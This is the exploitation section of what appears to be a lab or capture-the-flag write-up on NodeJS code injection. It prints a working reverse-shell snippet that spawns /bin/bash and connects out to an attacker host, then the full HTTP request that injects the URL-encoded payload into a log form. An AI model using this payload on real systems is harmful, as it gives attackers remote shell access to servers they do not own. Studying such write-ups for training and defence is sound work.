# Exploitation

### NodeJS Code Injection

{% embed url="<https://ibreak.software/2016/08/nodejs-rce-and-a-simple-reverse-shell/>" %}

Since we had already seen that the website was vulnerable to NodeJS command injection, we copied the following reverse-shell snippet from the post above.

```javascript
var net = require("net"), sh = require("child_process").exec("/bin/bash");
var client = new net.Socket();
client.connect(80, "attacker-ip", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);
sh.stderr.pipe(client);});
```

Changing the script to connect to port 3000 and replacing the listening host with our own IP resulted in a reverse shell.

Request used:

```http
POST /logs/new HTTP/1.1
Host: 192.168.135.110:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 344
Origin: http://192.168.135.110:3000
Connection: close
Referer: http://192.168.135.110:3000/logs/
Cookie: connect.sid=s%3AmSgkU3koIQeob1Pioo6GSNTjGvc71M7v.ehFLVLDZWnWSLoKEcRe%2B4BWhaQz7TCQJ9dub4Xc3Cac; userLevel=YWRtaW4=
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

username=hjb&msg=var+net+%3D+require%28%22net%22%29%2C+sh+%3D+require%28%22child_process%22%29.exec%28%22%2Fbin%2Fbash%22%29%3B%0D%0Avar+client+%3D+new+net.Socket%28%29%3B%0D%0Aclient.connect%283000%2C+%22192.168.49.135%22%2C+function%28%29%7Bclient.pipe%28sh.stdin%29%3Bsh.stdout.pipe%28client%29%3B%0D%0Ash.stderr.pipe%28client%29%3B%7D%29%3B
```

![](/files/L6QqE5swpORYhS0oAEH2)
